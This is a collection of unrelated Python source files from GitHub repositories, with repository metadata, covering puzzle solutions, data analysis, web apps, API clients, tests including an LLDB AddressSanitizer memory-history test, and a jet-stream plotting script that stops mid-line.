+{"seq_id":"17033256530","text":"with open (\"data/pe067.txt\", \"r\") as myfile:\n f = myfile.readlines()\n\nt = []\n\nfor lin in f:\n t.append(list(map(int, lin.split(\" \"))))\n\ndef next_max(prev_max, new_line):\n next = []\n for i in range(0, len(new_line)):\n n_max = new_line[i]\n left_max = prev_max[max(0, i - 1)]\n right_max = prev_max[min(len(prev_max) - 1, i)]\n n_max += max(left_max, right_max)\n next.append(n_max)\n return next\n\nm_list = t[0]\n\nfor i in range(1, len(t)):\n m_list = next_max(m_list, t[i])\n\nprint(max(m_list))\n \n\n","repo_name":"kwichmann/euler","sub_path":"pe067.py","file_name":"pe067.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24732130687","text":"import os\nimport matplotlib.pyplot as plt\nfrom sklearn import decomposition\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.preprocessing import StandardScaler\nfrom data_load import load_data\n\n\ndata_dir = '/home/ilya/code/ml4vs/data/dataset_OGLE/indexes_normalized'\nfile_1 = 'vast_lightcurve_statistics_normalized_variables_only.log'\nfile_0 = 'vast_lightcurve_statistics_normalized_constant_only.log'\nfile_0 = os.path.join(data_dir, file_0)\nfile_1 = os.path.join(data_dir, file_1)\nnames = ['Magnitude', 'clipped_sigma', 'meaningless_1', 'meaningless_2',\n 'star_ID', 'weighted_sigma', 'skew', 'kurt', 'I', 'J', 'K', 'L',\n 'Npts', 'MAD', 'lag1', 'RoMS', 'rCh2', 'Isgn', 'Vp2p', 'Jclp', 'Lclp',\n 'Jtim', 'Ltim', 'CSSD', 'Ex', 'inv_eta', 'E_A', 'S_B', 'NXS', 'IQR']\nnames_to_delete = ['Magnitude', 'meaningless_1', 'meaningless_2', 'star_ID',\n 'Npts', 'CSSD']\nX, y, df, feature_names, delta = load_data([file_0, file_1], names, names_to_delete)\n\n\nrpca = decomposition.RandomizedPCA()\nimp = Imputer(missing_values='NaN', strategy='median', axis=0, verbose=2)\nrpca_pipe = Pipeline(steps=[('imputation', imp),\n ('scaling', StandardScaler()),\n ('pca', rpca)])\nrpca_pipe.fit(X)\n\n\npca = decomposition.PCA()\nimp = Imputer(missing_values='NaN', strategy='median', axis=0, verbose=2)\npca_pipe = Pipeline(steps=[('imputation', imp),\n ('scaling', StandardScaler()),\n ('pca', pca)])\npca_pipe.fit(X)\n\nplt.figure(1, figsize=(4, 3))\nplt.clf()\nplt.axes([.2, .2, .7, .7])\nplt.plot(pca.explained_variance_ratio_, linewidth=2, color='b')\nplt.legend()\nplt.axis('tight')\nplt.xlabel(u'number of components')\nplt.ylabel(u'explained variance, $\\%$')\nplt.show()\nplt.savefig('PCA.png', bbox_inches='tight', dpi=200)\n\n","repo_name":"ipashchenko/ml4vs","sub_path":"ml4vs/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"33584557532","text":"from stall.model.assortment_product import AssortmentProduct\n\nasync def test_assortment_product(tap, dataset):\n with tap.plan(6):\n\n assortment = await dataset.assortment(title='привет')\n tap.ok(assortment, 'Создан ассортимент')\n tap.ok(assortment.assortment_id, 'идентификатор')\n tap.eq(assortment.title, 'привет', 'название')\n\n product = await dataset.product()\n tap.ok(product, 'продукт создан')\n\n\n ap = AssortmentProduct({\n 'assortment_id': assortment.assortment_id,\n 'product_id': product.product_id,\n 'max': 50,\n })\n\n tap.ok(ap, 'инстанцирован')\n tap.ok(await ap.save(), 'сохранён')\n\n\n\nasync def test_dataset(tap, dataset):\n with tap.plan(1):\n\n ap = await dataset.assortment_product()\n tap.ok(ap, 'продукт для ассортимента описан')\n\n\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests/model/assortment_product/test_instance.py","file_name":"test_instance.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20070115888","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\n# イメージ画像フォルダへのフルパス\nimage_path = \"FULL_PATH\"\n\nimg = cv2.imread(image_path + 'messi5.jpg',1)\nb,g,r = cv2.split(img)\nimg2 = cv2.merge([r,g,b])\nplt.imshow(img2)\nplt.xticks([]),plt.yticks([])\nplt.show()\n","repo_name":"dobuzora/practice","sub_path":"python/OpenCV/Tutorials/Gui_Features/1.Images/exercises.py","file_name":"exercises.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"8016648145","text":"import json\nimport os\n\n\ndef get_json_data(directory, prefix):\n for dirname, dirnames, filenames in os.walk(directory):\n for filename in filenames:\n if not filename.startswith(prefix) or not filename.endswith('.json'):\n continue\n print(\"loading \" + filename)\n yield json.load(open(os.path.join(dirname, filename), 'r'), encoding='utf-8')\n","repo_name":"boehlke/openslides_ansible","sub_path":"python/multiinstance/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1661133097","text":"import re\nfrom loguru import logger as lg\nfrom omg.config import config\nfrom omg.must_gather.load_resources import load_res\nfrom omg.must_gather.locate_yamls import locate_project\nfrom omg.utils.dget import dget\n\n\ndef _hide_hash(path):\n \"\"\"Hide the image hash in the path for better readability.\"\"\"\n return re.sub(\"sha256-[a-z0-9]*\", \"sha256*\", path)\n\n\ndef _show_info(path):\n\n out = lg.opt(colors=True).success\n\n proj_count = len(locate_project(path, \"yamls\"))\n out(\" Projects: {}\".format(proj_count))\n\n try:\n infra = load_res(path, \"infrastructure\")\n if infra:\n api_url = [\n dget(i, [\"res\", \"status\", \"apiServerURL\"]) for i in infra\n ]\n platform = [\n dget(i, [\"res\", \"status\", \"platform\"]) for i in infra\n ]\n out(\" API URL: {}\".format(api_url))\n out(\" Platform: {}\".format(platform))\n\n c_ver = load_res(path, \"clusterversion\")\n if c_ver:\n cluster_id = [\n dget(cv, [\"res\", \"spec\", \"clusterID\"]) for cv in c_ver\n ]\n desired_v = [\n dget(cv, [\"res\", \"status\", \"desired\", \"version\"]) for cv in c_ver\n ]\n out(\" Cluster ID: {}\".format(cluster_id))\n out(\" Desired Version: {}\".format(desired_v))\n out(\"\")\n except Exception as e:\n lg.warning(\"Error loading cluster info: {}\".format(e))\n\n\ndef show_mg_info(cfile=None):\n \"\"\"\n Shows the info of current selected must-gather(s)\n \"\"\"\n lg.debug(\"FUNC_INIT: {}\".format(locals()))\n\n cfg = config.get(cfile=cfile)\n lg.debug(\"Loaded config file: {}\".format(cfg))\n\n paths = cfg[\"paths\"]\n project = cfg[\"project\"]\n\n out = lg.opt(colors=True).success\n\n if \"cwd\" in cfg and cfg[\"cwd\"]:\n out(\"-=[CWD Mode]=-\")\n out(\"\")\n\n if len(paths) > 1:\n out(\"-=[MultiDir Mode]=-\")\n out(\"\")\n out(\"Selected must-gather paths:\")\n i = 1\n for path in paths:\n out(\" [{}] {}\".format(i, _hide_hash(path)))\n i = i + 1\n _show_info(path)\n out(\"\")\n out(\"Current Project: {}\".format(project))\n\n elif len(paths) == 1:\n out(\"Selected must-gather: {}\".format(_hide_hash(paths[0])))\n _show_info(paths[0])\n out(\" Current Project: {}\".format(project))\n","repo_name":"kxr/o-must-gather","sub_path":"omg/use/show_mg_info.py","file_name":"show_mg_info.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":152,"dataset":"github-code","pt":"66"} +{"seq_id":"13953408287","text":"#!/usr/bin/env python\n\nimport math\nimport numpy as np\nfrom ddeint import ddeint\nimport matplotlib.pyplot as plt\n\n# Elements:\n# 0: Uninfected\n# 1: Number incubating\n# 2: Number contagious\n# 3: Number observed\n\nP=1e9\n\nTi=14.0\nTc=7.0\n\ndef impulse(t):\n if 0.0 int:\n edge_count_at = defaultdict(int)\n for row in wall:\n prefix = 0\n for i,brick_width in enumerate(row):\n if i < len(row) - 1:\n prefix += brick_width\n edge_count_at[prefix] += 1\n return len(wall) - (max(edge_count_at.values()) if edge_count_at else 0)\n \n ","repo_name":"Mingyu-Kim-001/LeetCode","sub_path":"Arrays/medium/554. Brick Wall.py","file_name":"554. Brick Wall.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42999183549","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.views import generic\nfrom django.conf import settings\nfrom django.shortcuts import render, get_object_or_404\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.views.generic.edit import DeleteView\n\nimport datetime\nfrom django.http import HttpResponse, HttpResponseRedirect\n\nfrom .models import Student\nfrom django.shortcuts import render\nfrom .forms import StudentForm\n\n\n# Create your views here.\n\n\ndef home(request):\n if request.method == 'POST':\n form = StudentForm(request.POST, request.FILES)\n print(form.fields['doc_profile_pic'])\n if form.is_valid():\n student = form.save()\n print(\"save\")\n context = {'submit_check': 1, 'basic_form': StudentForm(\n initial={'gr_number': '55564', 'handicapped': False, 'jee_total': 120})}\n print(context.values())\n else:\n print(\"else\")\n context = {'submit_check': 0, }\n print(context.values())\n print(form.errors)\n return HttpResponseRedirect('/test/')\n\n else:\n context = {\n 'basic_form': StudentForm(initial={'gr_number': '55564', 'handicapped': False, 'jee_total': 120}),\n }\n\n return render(request, 'test/index.html', context)\n\n\ndef login(request):\n return render(request, 'test/login.html')\n\n\n\n\n\ndef grid_view(request):\n return render(request, 'test/all_students_grid.html', {\n 'root': settings.MEDIA_ROOT,\n 'all_students': Student.objects.all()\n })\n\n\ndef list_view(request):\n return render(request, 'test/all_students_list.html', {\n 'root': settings.MEDIA_ROOT,\n 'all_students': Student.objects.all()\n })\n\n\n# class DetailView(generic.ListView):\n# context = {\n# 'root': settings.MEDIA_ROOT,\n# 'all_students': Student.objects.all()\n# }\n#\n# # context_object_name = 'all_students' # optional...to override default object name object_list\n# def get_queryset(self):\n# return render()\n\n# class StudentDelete(DeleteView):\n# model = Student\n# success_url = reverse_lazy('home:all_students_list')\n\n\ndef detail_view(request, student_id):\n student = get_object_or_404(Student, pk=student_id)\n return render(request, 'test/details.html', {'student': student, 'basic_form': StudentForm()})\n\n\ndef update(request, student_id):\n # return HttpResponse(\"Hi\")\n student = get_object_or_404(Student, pk=student_id)\n print(student.doc_jee_marksheet.url)\n return render(request, 'test/update.html', {'basic_form': StudentForm(instance = student)})\n","repo_name":"akzarma/mysite","sub_path":"temp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11476450974","text":"\n# coding: utf-8\n\n# In[2]:\n\n\nimport csv\n\n\n# In[7]:\n\ndef count_votes():\n with open('PyPollData.csv') as file:\n poll_data = csv.reader(file, delimiter=\",\")\n next(poll_data)\n total_votes = 0\n candidates = {}\n for row in poll_data:\n candidate = row[2]\n if candidate not in candidates:\n candidates[candidate] = 1\n else:\n candidates[candidate] += 1\n total_votes += 1\n vote_candidates = []\n for k, v in candidates.items():\n vote_candidates.append(f'{k}: {round((v/total_votes)*100, 2)}% ({v})')\n candidate_list = \"\\n\".join(vote_candidates)\n winner = max(candidates.keys(), key=(lambda k: candidates[k]))\n return \\\n f'''Election Results\n ---------------------\n Total Votes: {total_votes}\n ---------------------\n {candidate_list}\n ---------------------\n Winner: {winner}\n ---------------------\n '''\noutput = count_votes()\nprint(output)\nwith open(\"pypoll.txt\", \"w\") as file:\n file.write(output)\n","repo_name":"j9stuart/python-challenge","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74471499411","text":"from .http import HTTPClient\nfrom .cosmetics import Cosmetics\nfrom .epic import EpicEndpoints\nfrom .meshes import Meshes\nfrom .shop import BRShop\nfrom .aes import FortniteAES\n\nfrom typing import Any\n\n\nclass APIClient:\n def __init__(self) -> None:\n self.http = HTTPClient()\n\n self.cosmetics = Cosmetics(self)\n self.epic = EpicEndpoints(self)\n self.meshes = Meshes(self)\n\n async def get_shop(self) -> BRShop:\n \"\"\"|coro|\n\n Gets a parsed version of the current battle royale shop (updates every day at UTC 0:00).\n\n Returns\n -------\n :class`BRShop`:\n BRShop object containing featured, daily, specialFeatured and specialDaily.\n \"\"\"\n\n data = await self.http.request(\n method=\"GET\",\n url=\"/shop/br\"\n )\n\n return BRShop(data)\n\n async def get_dynamic_aes_keys(self) -> list:\n \"\"\"|coro|\n\n Gets all current dynamic AES keys. Returns None if there is no dynamic aes keys.\n\n Returns\n -------\n :class:`list[:class`FortniteAES`]`:\n List containing FortniteAES objects containing dynamic key information.\n \"\"\"\n\n data = await self.http.request(\n method=\"GET\",\n url=\"/aes/dynamic\"\n )\n\n return [FortniteAES(dynamic_key) for dynamic_key in data] if len(data) is not 0 else None\n\n async def get_main_aes_key(self) -> str:\n \"\"\"|coro|\n\n Gets the main AES key in its 32 byte hex form. Updates within a few seconds of a update.\n\n Returns\n -------\n :class:`str`:\n Main aes key in 32 byte hex form.\n \"\"\"\n\n return await self.http.request(method=\"GET\", url=\"/aes/main\")\n\n","repo_name":"xMistt/snailapi","sub_path":"snailapi/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"12376871981","text":"import sys,os\nsys.path.append(os.getcwd())\n\nfrom src.components.server.adapters.storage_adapter import StorageAdapter\nfrom src.components.server.adapters.memory_storage_adapter import MemoryStorageAdapter\nfrom src.components.server.controllers.controller import Controller\nfrom src.components.server.repositories.repository import Repository\nfrom src.common.actions import Actions\nfrom src.common.models.model import Model\nfrom src.common.request import Request\nfrom src.components.server.request_router import RequestRouter\nfrom uuid import UUID, uuid4 as Uuid\n\n\nid=Uuid()\n\nclass MockModel(Model):\n def from_json(json_object: str) -> object:\n return MockModel(id)\n\n\nMOCK_MODEL_ROUTE = \"MockModel\"\nMOCK_MODEL = MockModel\n\ndef prepare_mock_repository(mock_model, storage: StorageAdapter) -> Repository:\n repository = Repository(mock_model)\n repository.storage = storage\n print(repository.storage)\n return repository\n\ndef prepare_mock_controller(mock_repository: Repository) -> Controller:\n controller = Controller(Model)\n controller.repository = mock_repository\n return controller\n\nstorage=MemoryStorageAdapter()\nmock_repository = prepare_mock_repository(MOCK_MODEL, storage)\nmock_controller = prepare_mock_controller(mock_repository)\n\ntest_context={\n \"controllers\": {\n MOCK_MODEL_ROUTE: mock_controller,\n },\n \"repositories\": {\n \"mock_repository\": mock_repository\n },\n \"request_args\": {\n \"route\": MOCK_MODEL_ROUTE,\n \"payload\": MOCK_MODEL(id),\n \"action\": Actions.CREATE\n }\n}\n\nclass TestController:\n def test_create_mock_object(self):\n request = Request(**test_context[\"request_args\"])\n\n request_router=RequestRouter()\n request_router.controllers = test_context['controllers']\n\n routed_controller = request_router.get_controller(request)\n\n routed_controller.receive_request(request)\n\n result = storage.findById(id, MockModel.__name__)\n\n assert result.id == id","repo_name":"lucas-dolsan/dsd-socket-t1","sub_path":"test/integration/test_controller.py","file_name":"test_controller.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18376814762","text":"from .base import BaseTcm\n\n\nclass Zephyr(BaseTcm):\n SYNC_ENABLED = \"com.zebrunner.app/tcm.zephyr.sync.enabled\"\n SYNC_REAL_TIME = \"com.zebrunner.app/tcm.zephyr.sync.real-time\"\n TEST_CYCLE_KEY = \"com.zebrunner.app/tcm.zephyr.test-cycle-key\"\n JIRA_PROJECT_KEY = \"com.zebrunner.app/tcm.zephyr.jira-project-key\"\n TEST_CASE_KEY = \"com.zebrunner.app/tcm.zephyr.test-case-key\"\n\n @staticmethod\n def disable_sync() -> None:\n Zephyr._verify_no_tests()\n Zephyr._attach_label(Zephyr.SYNC_ENABLED, \"false\")\n\n @staticmethod\n def enable_real_time_sync() -> None:\n Zephyr._verify_no_tests()\n Zephyr._attach_label(Zephyr.SYNC_REAL_TIME, \"true\")\n\n @staticmethod\n def set_test_cycle_key(key: str) -> None:\n Zephyr._verify_no_tests()\n Zephyr._attach_label(Zephyr.TEST_CYCLE_KEY, key)\n\n @staticmethod\n def set_jira_project_key(key: str) -> None:\n Zephyr._verify_no_tests()\n Zephyr._attach_label(Zephyr.JIRA_PROJECT_KEY, key)\n\n @staticmethod\n def set_test_case_key(key: str) -> None:\n Zephyr._attach_label(Zephyr.TEST_CASE_KEY, key)\n","repo_name":"zebrunner/python-agent-robot","sub_path":"src/robotframework_zebrunner/tcm/zephyr.py","file_name":"zephyr.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"69916626772","text":"import os\nimport datetime\n\nfrom flask import Blueprint, flash, render_template, Markup, Response, request, redirect, url_for\nfrom flask_login import current_user, login_required\n\nfrom remainder.models import Sleep\nfrom remainder.main.utils import (\n hour_min, get_scalers, avg_delta,\n estimate_remaining_of_today, config_pie, encode_pie_chart,\n sql_query_to_csv\n)\nfrom remainder.main.forms import ContactForm\nfrom remainder.users.utils import send_email\n\n\nmain_bp = Blueprint('main', __name__)\n\n\n@main_bp.route('/main/')\n@login_required\ndef dashboard():\n daily_records = list(Sleep.query.filter_by(user=current_user).\n order_by(Sleep.up.desc()))\n\n page = request.args.get('page', 1, type=int)\n\n records_pagination = Sleep.query.filter_by(user=current_user).\\\n order_by(Sleep.up.desc()).paginate(page=page, per_page=5)\n\n # Summary part and Remaining Time part\n # Default information: NO RECORD\n dashboard = {\n 'avg_up': 'NO RECORD',\n 'avg_bed': 'NO RECORD',\n 'avg_sleep': 'NO RECORD',\n 'bed_time': 'NO RECORD',\n 'remaining': 'NO RECORD'\n }\n\n # If there's been no daily_records, use Default information in the view\n if len(daily_records) == 0:\n return render_template('/dashboard.html',\n records_pagination=records_pagination,\n dashboard=dashboard)\n\n else:\n # Summary part\n _, up_deltas, bed_deltas, sleep_sec = get_scalers(daily_records)\n\n avg_up = avg_delta(up_deltas)\n avg_bed = avg_delta(bed_deltas)\n avg_sleep = sum(sleep_sec) / len(sleep_sec)\n\n dashboard['avg_up'] = avg_up[7:12]\n dashboard['avg_bed'] = avg_bed[7:12]\n dashboard['avg_sleep'] = '{0[0]}h {0[1]}m'.format(hour_min(int(avg_sleep)))\n\n # Remaining Time part\n timezone = current_user.timezone\n up_today_dt = daily_records[0].up\n bed_time, remaining = estimate_remaining_of_today(avg_sleep, up_today_dt, timezone)\n dashboard['bed_time'] = str(bed_time)[-8:-3]\n dashboard['remaining'] = '{0[0]}h {0[1]}m'.format(hour_min(remaining))\n\n if remaining < 0:\n flash(\"Need a new record to refresh Remaining Time!\", 'alert')\n dashboard['remaining'] = '[Record for Today must be added]'\n\n # Pie-chart for Remaining Time\n plot_url = encode_pie_chart(config_pie(remaining, up_today_dt, timezone))\n\n pie_html_string = Markup(\n f''\n )\n\n return render_template('/dashboard.html',\n records_pagination=records_pagination,\n dashboard=dashboard,\n pie_html_string=pie_html_string)\n\n\n@main_bp.route('/main/download')\n@login_required\ndef download():\n daily_records = list(Sleep.query.filter_by(user=current_user).order_by(Sleep.up.desc()))\n if len(daily_records) == 0:\n flash('No records to download.', 'info')\n return redirect(url_for('main.dashboard'))\n csv = sql_query_to_csv(daily_records, columns_to_exclude=['user_id', 'id', '_sa_instance_state', 'created_at'])\n csv = csv.replace(',\\n', '\\n') # Remove unnecessary ',' at the EOL\n csv = csv.replace(' up', 'up') # Remove unnecessary whitespace before 'up'\n\n date = datetime.date.today().strftime('%Y%m%d')\n return Response(\n csv,\n mimetype=\"text/csv\",\n headers={\"Content-disposition\":\n f\"attachment; filename=record_{date}.csv\"})\n\n\n@main_bp.route('/main/contact', methods=['GET', 'POST'])\ndef contact():\n form = ContactForm()\n if form.validate_on_submit():\n admin_email = os.environ.get('EMAIL_REMAINDER')\n\n config_forward = {\n 'subject': f'Message from User ({form.firstname.data})',\n 'bodyText': f\"\"\"{form.firstname.data} {form.lastname.data} ({form.email.data}) wrote\\n\\nMessage:\\n{form.message.data}\"\"\",\n 'fromAddress': admin_email,\n 'toAddress': admin_email\n }\n send_email(config_forward)\n\n config_thank = {\n 'subject': f\"We've got your message!\",\n 'bodyText': f\"\"\"Dear {form.firstname.data},\\n\\n\nThank you for contacting us! We've received your message and will get back to you within 48 hours.\\n\nCheers,\\nRemainder Admin\\nREMAINDER\\nhttps://remainder-app.herokuapp.com/\"\"\",\n 'fromAddress': admin_email,\n 'toAddress': form.email.data\n }\n send_email(config_thank)\n flash(\"Thank you!\\nWe've received your message and will get back to you within 48 hours.\", 'success')\n return redirect(url_for('main.contact'))\n return render_template('contact.html', title='Contact Us', form=form)\n","repo_name":"kkkzn/remainder","sub_path":"remainder/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11619252239","text":"\"\"\"\nTest that ASan memory history provider returns correct stack traces\n\"\"\"\n\n\nimport lldb\nfrom lldbsuite.test.decorators import *\nfrom lldbsuite.test.lldbtest import *\nfrom lldbsuite.test import lldbplatform\nfrom lldbsuite.test import lldbutil\n\n\nclass AsanTestCase(TestBase):\n @skipIfFreeBSD # llvm.org/pr21136 runtimes not yet available by default\n @expectedFailureNetBSD\n @skipUnlessAddressSanitizer\n def test(self):\n self.build()\n self.asan_tests()\n\n def setUp(self):\n # Call super's setUp().\n TestBase.setUp(self)\n self.line_malloc = line_number(\"main.c\", \"// malloc line\")\n self.line_malloc2 = line_number(\"main.c\", \"// malloc2 line\")\n self.line_free = line_number(\"main.c\", \"// free line\")\n self.line_breakpoint = line_number(\"main.c\", \"// break line\")\n\n def asan_tests(self):\n target = self.createTestTarget()\n\n self.registerSanitizerLibrariesWithTarget(target)\n\n self.runCmd(\"breakpoint set -f main.c -l %d\" % self.line_breakpoint)\n\n # \"memory history\" command should not work without a process\n self.expect(\n \"memory history 0\",\n error=True,\n substrs=[\"Command requires a current process\"],\n )\n\n self.runCmd(\"run\")\n\n stop_reason = (\n self.dbg.GetSelectedTarget().process.GetSelectedThread().GetStopReason()\n )\n if stop_reason == lldb.eStopReasonExec:\n # On OS X 10.10 and older, we need to re-exec to enable\n # interceptors.\n self.runCmd(\"continue\")\n\n # the stop reason of the thread should be breakpoint.\n self.expect(\n \"thread list\",\n STOPPED_DUE_TO_BREAKPOINT,\n substrs=[\"stopped\", \"stop reason = breakpoint\"],\n )\n\n # test that the ASan dylib is present\n self.expect(\n \"image lookup -n __asan_describe_address\",\n \"__asan_describe_address should be present\",\n substrs=[\"1 match found\"],\n )\n\n # test the 'memory history' command\n self.expect(\n \"memory history 'pointer'\",\n substrs=[\n \"Memory deallocated by Thread\",\n \"a.out`f2\",\n \"main.c:%d\" % self.line_free,\n \"Memory allocated by Thread\",\n \"a.out`f1\",\n \"main.c:%d\" % self.line_malloc,\n ],\n )\n\n # do the same using SB API\n process = self.dbg.GetSelectedTarget().process\n val = (\n process.GetSelectedThread().GetSelectedFrame().EvaluateExpression(\"pointer\")\n )\n addr = val.GetValueAsUnsigned()\n threads = process.GetHistoryThreads(addr)\n self.assertEqual(threads.GetSize(), 2)\n\n history_thread = threads.GetThreadAtIndex(0)\n self.assertTrue(history_thread.num_frames >= 2)\n self.assertEqual(\n history_thread.frames[1].GetLineEntry().GetFileSpec().GetFilename(),\n \"main.c\",\n )\n self.assertEqual(\n history_thread.frames[1].GetLineEntry().GetLine(), self.line_free\n )\n\n history_thread = threads.GetThreadAtIndex(1)\n self.assertTrue(history_thread.num_frames >= 2)\n self.assertEqual(\n history_thread.frames[1].GetLineEntry().GetFileSpec().GetFilename(),\n \"main.c\",\n )\n self.assertEqual(\n history_thread.frames[1].GetLineEntry().GetLine(), self.line_malloc\n )\n\n # let's free the container (SBThreadCollection) and see if the\n # SBThreads still live\n threads = None\n self.assertTrue(history_thread.num_frames >= 2)\n self.assertEqual(\n history_thread.frames[1].GetLineEntry().GetFileSpec().GetFilename(),\n \"main.c\",\n )\n self.assertEqual(\n history_thread.frames[1].GetLineEntry().GetLine(), self.line_malloc\n )\n\n # ASan will break when a report occurs and we'll try the API then\n self.runCmd(\"continue\")\n\n self.expect(\n \"thread list\",\n \"Process should be stopped due to ASan report\",\n substrs=[\"stopped\", \"stop reason = Use of deallocated memory\"],\n )\n\n # make sure the 'memory history' command still works even when we're\n # generating a report now\n self.expect(\n \"memory history 'another_pointer'\",\n substrs=[\n \"Memory allocated by Thread\",\n \"a.out`f1\",\n \"main.c:%d\" % self.line_malloc2,\n ],\n )\n","repo_name":"llvm/llvm-project","sub_path":"lldb/test/API/functionalities/asan/TestMemoryHistory.py","file_name":"TestMemoryHistory.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":22888,"dataset":"github-code","pt":"66"} +{"seq_id":"22496501201","text":"\"\"\"\n Train resnet for celeba_a and celeba_b\n\"\"\"\nimport sys\n\nsys.path.append(r\"/local/home/david/Remote/PruneFramework\")\n\nfrom models.model_res import exp\n\nimport os\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nif __name__ == '__main__':\n # an example to train resnet18 on CelebA\n tasks_celeba = [\n {\n 'model_name': 'resnet18',\n 'data_name': 'celeba',\n 'task_name': 'celeba_a'\n },\n {\n 'model_name': 'resnet18',\n 'data_name': 'celeba',\n 'task_name': 'celeba_b'\n },\n\n {\n 'model_name': 'resnet18',\n 'data_name': 'celeba',\n 'task_name': 'celeba'\n }\n ]\n\n for task in tasks_celeba:\n exp(\n model_name=task['model_name'],\n data_name=task['data_name'],\n task_name=task['task_name'],\n\n save_step='-1',\n plan_train=task.get('plan_train_normal',\n [\n {'n_epochs': 30, 'lr': 0.01},\n ]),\n path_model=task.get('path_model', None),\n batch_size=task.get('batch_size', None)\n )\n","repo_name":"MrDavidG/PruneFramework","sub_path":"exp_run/train_resnet.py","file_name":"train_resnet.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"22478558970","text":"# Last modified: Time-stamp: <2020-05-15 15:40:42 haines>\nr\"\"\" Jetstream vizualization (jsviz) tool using ECMWF Reanalysis v5 (ERA5) data\n\nPlots:\n\n(1) For a given time, show map (hmap) of mean sea level pressure (msl), average of\nupper troposphere (100-400 hPa) wind speed (wspd), and geopotential height (hgt).\n(2) For a given time and longitude, show vertical section (vsec) of\nwspd and hgt through upper troposphere as latitude vs altitude.\n\nGUI:\n Longitude slider with prev and next buttons\n Time slider with prev and next buttons\n\nUsage:\nUsing IPython console, use magic to run code as if at unix prompt and\nprovide year and month to view e.g.\n%run jsviz.py [yyyy_mm]\n\nStart ipython in era5 python environment\n(era5) C:\\Users\\haines>ipython\n\nIn[]: cd Dropbox/peach/era5\nIn[]: %run jsviz.py 2018_01\nIn[]: plt.show()\n\nStill TODO:\n (Select how vertical section is plotted: press lvl or standard alt or msl altitude)\n\n\"\"\"\n\nimport sys\nfrom jsutil import *\n\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gs\nfrom matplotlib.widgets import Slider, Button, TextBox, CheckButtons\n\n# suppress warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# Define default data bounds for analysis\nBB = dict( lon=[-140, -50],\n lat=[ 0, 80],\n lvl=[ 100, 500],\n dt = [datetime.datetime(2017,1,1), datetime.datetime(2017,2,1)]\n )\n\n# Define default bounding box for the figure\nBB_fig = dict( lon=[-140, -50],\n lat=[ 10, 60],\n lvl=[ 100, 500],\n dt = [datetime.datetime(2017,1,1), datetime.datetime(2017,2,1)]\n )\n\n# grab the coastline dataset\nlines = get_coastlines()\n\n# empty array for jet stream indices in data\njs = np.array([])\n# js column order defined as [JSDT,JSLVL,JSLAT,JSLON]\nJSDT,JSLVL,JSLAT,JSLON = 0,1,2,3\n\nlm = { 'num_peaks' : 4,\n 'min_distance' : 3,\n 'exclude_border' : 0,\n 'threshold_abs': 40.,\n #\n 'peaks_inside_toggle': 1,\n 'peaks_inside_threshold': 30.,\n 'peaks_inside_zonal_max': 0}\n\n\n# setup figure layout \nfig = plt.figure(figsize=(10, 7.5))\naxs = [fig.add_axes((.1,.1,.6,.7)),0,0]\n\n# main map\ntitle1_str = 'avg wspd (100-400 hPa), \\nhgt (300 hPa), msl pressure (hPa)'\naxs[0].set_title(title1_str, loc='right')\nt1 = axs[0].set_title('YYYY_MM_DD_HHMM', loc='left')\n# set aspect to simply mimic equidistant projection\naxs[0].set_aspect(1/np.cos(np.pi*np.mean(BB_fig['lat'])/180.)) \naxs[0].set_xlim(BB_fig['lon'][0],BB_fig['lon'][1])\naxs[0].set_ylim(BB_fig['lat'][0],BB_fig['lat'][1])\naxs[0].set_xlabel('Longitude (deg)')\naxs[0].set_ylabel('Latitude (deg)')\n# plot coastline/lakes\naxs[0].plot(lines['lon'],lines['lat'],'k',linewidth=0.5)\n# plot dotted vertical line at longitude of section plot\nl1 = axs[0].axvline(x=0, color='b', linestyle=':', linewidth=3.0)\n\n# wpsd color bar\n# get_positions returns Bbox, we want Bbox.bounds\nl,b,w,h = axs[0].get_position().bounds\naxs[1] = 